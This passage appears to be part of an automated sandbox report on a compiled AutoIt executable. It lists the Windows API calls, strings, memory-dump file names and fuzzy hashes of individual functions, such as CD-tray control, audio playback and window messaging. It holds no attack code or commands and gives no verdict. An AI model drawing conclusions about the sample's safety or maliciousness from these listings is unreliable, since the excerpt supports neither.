            • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
            • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: SendString$_wcslen$BuffCharDriveLowerType_memmove
          • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
          • API String ID: 1976180769-4113822522
          • Opcode ID: 0f6c8a3de1c9442f7f3474ab6782275dee6e5c09c811d69c53e3fb1fd536eda6
          • Instruction ID: 81dc6b2e9a5b1b7ac5bd11c7175921e379baf9e0c2b27e14ed053c07c028f3b1
          • Opcode Fuzzy Hash: 0f6c8a3de1c9442f7f3474ab6782275dee6e5c09c811d69c53e3fb1fd536eda6
          • Instruction Fuzzy Hash: 75516E715043049FD710EF21C981B5EB3E4BF88304F14896FF995AB292D7B8E909CB5A
          APIs
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: _wcslen$_wcsncpy$LocalTime__fassign
          • String ID:
          • API String ID: 461458858-0
          • Opcode ID: 26761b0a7209b856481a9ddbc8736091f87f92f0ac2320453e44697a96ade7e6
          • Instruction ID: 9848deb76f2cd1bd94a84263f46e444e1138d8b87e7a9916e51222e649cc75ea
          • Opcode Fuzzy Hash: 26761b0a7209b856481a9ddbc8736091f87f92f0ac2320453e44697a96ade7e6
          • Instruction Fuzzy Hash: B1417372D10204B6CF10EFA5C946ADFF3B8DF49314F90885BE909E3121F6B4E65583A9
          APIs
          • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 004300C3
          • GetFileSize.KERNEL32(00000000,00000000), ref: 004300DE
          • GlobalAlloc.KERNEL32(00000002,00000000), ref: 004300E9
          • GlobalLock.KERNEL32 ref: 004300F6
          • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00430105
          • GlobalUnlock.KERNEL32(00000000), ref: 0043010C
          • CloseHandle.KERNEL32(00000000), ref: 00430113
          • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00430120
          • OleLoadPicture.OLEAUT32(?,00000000,00000000,004829F8,?), ref: 0043013E
          • GlobalFree.KERNEL32(00000000), ref: 00430150
          • GetObjectW.GDI32(?,00000018,?), ref: 00430177
          • CopyImage.USER32 ref: 004301A8
          • DeleteObject.GDI32(?), ref: 004301D0
          • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 004301E7
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: Global$File$CreateObject$AllocCloseCopyDeleteFreeHandleImageLoadLockMessagePictureReadSendSizeStreamUnlock
          • String ID:
          • API String ID: 3969911579-0
          • Opcode ID: fd1addb57dfcb9cf3c81a7192785a12cb72203be8d3c1966912b6329e8233f20
          • Instruction ID: 40287395d2d29e4935595b2baf4d6657c54b4003bec4d35786bf86d2452689d1
          • Opcode Fuzzy Hash: fd1addb57dfcb9cf3c81a7192785a12cb72203be8d3c1966912b6329e8233f20
          • Instruction Fuzzy Hash: 41414C75600208AFDB10DF64DD88FAE77B8EF48711F108659FA05AB290D7B5AD01CB68
          APIs
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: Menu$Delete$Destroy$ItemObject$CountDrawIconInfoWindow
          • String ID: 0
          • API String ID: 956284711-4108050209
          • Opcode ID: d13a276e73d68c5a88ff05331af00a4635b68400f986b822500444c43e982ccd
          • Instruction ID: b5af5d15e8ca477bb279da78e69062a53aed449fe0dbaae2e4c2ef00f9b57ed5
          • Opcode Fuzzy Hash: d13a276e73d68c5a88ff05331af00a4635b68400f986b822500444c43e982ccd
          • Instruction Fuzzy Hash: 91412770200601AFD714DF64D9A8B6B77A8BF48302F10896DFD45CB292D778E848CFA9
          APIs
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: _wcscpy$Cleanup$Startup_memmove_strcatgethostbynamegethostnameinet_ntoa
          • String ID: 0.0.0.0
          • API String ID: 1965227024-3771769585
          • Opcode ID: 26b12fbff4d00c82a0a207e3059eddb61ab54a01c3bbbcf423605757ca3fe1a5
          • Instruction ID: 28916de6e65f37ac85efecafd260a3a31c9a3caf28ae6c56f7260ddb0d4b80cb
          • Opcode Fuzzy Hash: 26b12fbff4d00c82a0a207e3059eddb61ab54a01c3bbbcf423605757ca3fe1a5
          • Instruction Fuzzy Hash: 4F213A32A00114BBC710AF65DC05EEF736CEF99716F0045AFF90993151EEB99A8187E8
          APIs
            • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
            • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
          • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0045F5D5
          • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F5EC
          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045F5FE
          • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0045F611
          • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F61E
          • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0045F634
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: SendString$_memmove_wcslen
          • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
          • API String ID: 369157077-1007645807
          • Opcode ID: f963851227cb2bcafec7df3ef8778280fda42e08bc5c03876a4728c3ed9f2a05
          • Instruction ID: e81aaa69409cfefceaf3864659f825962b2ddf67c6d06b6a861a29a56a66176d
          • Opcode Fuzzy Hash: f963851227cb2bcafec7df3ef8778280fda42e08bc5c03876a4728c3ed9f2a05
          • Instruction Fuzzy Hash: 7F21A83168021D66E720FB95DC46FFE7368AF40700F20087BFA14B71D1DAB4A949879D
          APIs
          • GetParent.USER32 ref: 00445BF8
          • GetClassNameW.USER32(00000000,?,00000100), ref: 00445C0D
          • __wcsicoll.LIBCMT ref: 00445C33
          • __wcsicoll.LIBCMT ref: 00445C4F
          • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00445CA9
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: __wcsicoll$ClassMessageNameParentSend
          • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
          • API String ID: 3125838495-3381328864
          • Opcode ID: 17bab07e815737d0aecd422002c3b7a0f260523ca91fc6be5302b60c0052203b
          • Instruction ID: b9a51c7f116d0e73852bd225d20f6d8bcb5f39b8f57bd3164038c04ed7d94027
          • Opcode Fuzzy Hash: 17bab07e815737d0aecd422002c3b7a0f260523ca91fc6be5302b60c0052203b
          • Instruction Fuzzy Hash: C6110AB1E447017BFE10BA659D46EBB339C9B54B11F00051BFE44D7242F6ACA94147A9
          APIs
          • SendMessageW.USER32(?,?,000000FF,?), ref: 004492A4
          • SendMessageW.USER32(?,?,00000000,00000000), ref: 004492B7
          • CharNextW.USER32(?), ref: 004492E9
          • SendMessageW.USER32(?,?,00000000,00000000), ref: 00449301
          • SendMessageW.USER32(?,?,00000000,?), ref: 00449332
          • SendMessageW.USER32(?,?,000000FF,?), ref: 00449349
          • SendMessageW.USER32(?,?,00000000,00000000), ref: 0044935C
          • SendMessageW.USER32(?,00000402,?), ref: 00449399
          • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0044940D
          • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449477
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: MessageSend$CharNext
          • String ID:
          • API String ID: 1350042424-0
          • Opcode ID: 0066c399e5a393c923680e2e66105d8530035c3b09cc99687380ea8ee93f4497
          • Instruction ID: 867fdc7b80e212b75fe5daf06e5219747a853435bb2a874e280223eddbea68d3
          • Opcode Fuzzy Hash: 0066c399e5a393c923680e2e66105d8530035c3b09cc99687380ea8ee93f4497
          • Instruction Fuzzy Hash: 5B81D535A00119BBEB10CF85DD80FFFB778FB55720F10825AFA14AA280D7B99D4197A4
          APIs
          • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E77F
            • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
            • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
          • LoadStringW.USER32(?,?,?,00000FFF), ref: 0045E7A0
          • __swprintf.LIBCMT ref: 0045E7F7
          • _wprintf.LIBCMT ref: 0045E8B3
          • _wprintf.LIBCMT ref: 0045E8D7
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
          • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
          • API String ID: 2295938435-2354261254
          • Opcode ID: 44e01960a33580a095bbf2e3e13559187395cafc70d58b6b713acd2f3f366ced
          • Instruction ID: 453f5dd12ee62c270a242db3517b58e8b6225e49c0ff470bc5072f32437c925c
          • Opcode Fuzzy Hash: 44e01960a33580a095bbf2e3e13559187395cafc70d58b6b713acd2f3f366ced
          • Instruction Fuzzy Hash: 6A519E71A10219ABDB14EB91CC85EEF7778AF44314F14407EF90477292DB78AE49CBA8
          APIs
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: __swprintf_wcscpy$__i64tow__itow
          • String ID: %.15g$0x%p$False$True
          • API String ID: 3038501623-2263619337
          • Opcode ID: 2da3dc3bab2513e5f9c5473ab76f3bf5e8912bd6dc6cced4603df506e747155f
          • Instruction ID: fd507a47f7d2c8f7f5848ea17d112ce969af4838d766d220e6d3988dad71e25c
          • Opcode Fuzzy Hash: 2da3dc3bab2513e5f9c5473ab76f3bf5e8912bd6dc6cced4603df506e747155f
          • Instruction Fuzzy Hash: 264108729001005BDB10EF75DC42FAAB364EF55306F0445ABFE09CB242EA39DA48C79A
          APIs
          • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E580
            • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
            • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
          • LoadStringW.USER32(?,00000072,?,00000FFF), ref: 0045E59F
          • __swprintf.LIBCMT ref: 0045E5F6
          • _wprintf.LIBCMT ref: 0045E6A3
          • _wprintf.LIBCMT ref: 0045E6C7
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
          • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
          • API String ID: 2295938435-8599901
          • Opcode ID: 97ebc5a5c228c2a30bddf96a7da616a93a1f5c8b5e746e323a0bc296dbc3a2d1
          • Instruction ID: ff3e2b23dced8a629e5b21f12e79e468b5cd48208a3d74017576322ff0354a8f
          • Opcode Fuzzy Hash: 97ebc5a5c228c2a30bddf96a7da616a93a1f5c8b5e746e323a0bc296dbc3a2d1
          • Instruction Fuzzy Hash: 9A519171D00109ABDB14EBA1C845EEF7778EF44304F50847EF91477292EA78AE49CBA8
          APIs
          • timeGetTime.WINMM ref: 00443B67
            • Part of subcall function 0040C620: timeGetTime.WINMM ref: 0040C620
          • Sleep.KERNEL32(0000000A), ref: 00443B9F
          • FindWindowExW.USER32 ref: 00443BC8
          • SetActiveWindow.USER32(?), ref: 00443BEC
          • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00443BFC
          • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00443C22
          • Sleep.KERNEL32(000000FA), ref: 00443C2D
          • IsWindow.USER32(?), ref: 00443C3A
          • EndDialog.USER32 ref: 00443C4C
            • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
            • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32(00000000), ref: 004439EB
            • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
          • EnumThreadWindows.USER32 ref: 00443C6B
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: ThreadWindow$MessageSendSleepTimetime$ActiveAttachCurrentDialogEnumFindInputProcessWindows
          • String ID: BUTTON
          • API String ID: 1834419854-3405671355
          • Opcode ID: 0b90b562b2b8ddd8d32d3d53e67965f547c0866e24595f66544518a968b379f6
          • Instruction ID: 3c6370bb7d17ad47abda0b7088cfd3672c19e1ca6c3f529de1b12449ce3ad6f8
          • Opcode Fuzzy Hash: 0b90b562b2b8ddd8d32d3d53e67965f547c0866e24595f66544518a968b379f6
          • Instruction Fuzzy Hash: 6B31E676784200BFE3349F74FD99F5A3B58AB55B22F10083AF600EA2A1D6B5A441876C
          APIs
          • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,?,?,?,0042820D,?,?,?,#include depth exceeded. Make sure there are no recursive includes,?), ref: 00454039
          • LoadStringW.USER32(00000000), ref: 00454040
            • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
            • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
          • _wprintf.LIBCMT ref: 00454074
          • __swprintf.LIBCMT ref: 004540A3
          • MessageBoxW.USER32 ref: 0045410F
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: HandleLoadMessageModuleString__swprintf_memmove_wcslen_wprintf
          • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
          • API String ID: 455036304-4153970271
          • Opcode ID: 0cc89bd23a2e2e53ac7bb2b5ed0e913a3f1e972501752cb0da19f3bd95e8304c
          • Instruction ID: e2f14448b15a7dab571624068eda089460c560eca1c8ebe4dd0daaccfe0aa2c5
          • Opcode Fuzzy Hash: 0cc89bd23a2e2e53ac7bb2b5ed0e913a3f1e972501752cb0da19f3bd95e8304c
          • Instruction Fuzzy Hash: 3B31E872B0011997CB00EF95CD069AE3378AF88714F50445EFA0877282D678AE45C7A9
          APIs
          • GetSysColorBrush.USER32 ref: 004104C3
          • RegisterClassExW.USER32(00000030), ref: 004104ED
          • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
          • InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
          • LoadIconW.USER32 ref: 00410542
          • ImageList_ReplaceIcon.COMCTL32(009D3FD8,000000FF,00000000), ref: 00410552
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
          • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
          • API String ID: 2914291525-1005189915
          • Opcode ID: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
          • Instruction ID: 324008788ca11066222c16167fc5b3db855b21205033cf9bff29629ff6c43806
          • Opcode Fuzzy Hash: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
          • Instruction Fuzzy Hash: 6221F7B1900218AFDB40DFA4E988B9DBFB4FB09710F10862EFA15A6390D7B40544CF99
          APIs
          • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467D63
          • SafeArrayAccessData.OLEAUT32(0000007F,0000007F), ref: 00467DDC
          • SafeArrayGetVartype.OLEAUT32(0000007F,?), ref: 00467E71
          • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00467E9D
          • _memmove.LIBCMT ref: 00467EB8
          • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 00467EC1
          • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467EDE
          • _memmove.LIBCMT ref: 00467F6C
          • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467FC1
          • SafeArrayUnaccessData.OLEAUT32(00000004), ref: 00467FAB
            • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
            • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
            • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
          • SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00467E48
            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
          • SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00468030
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
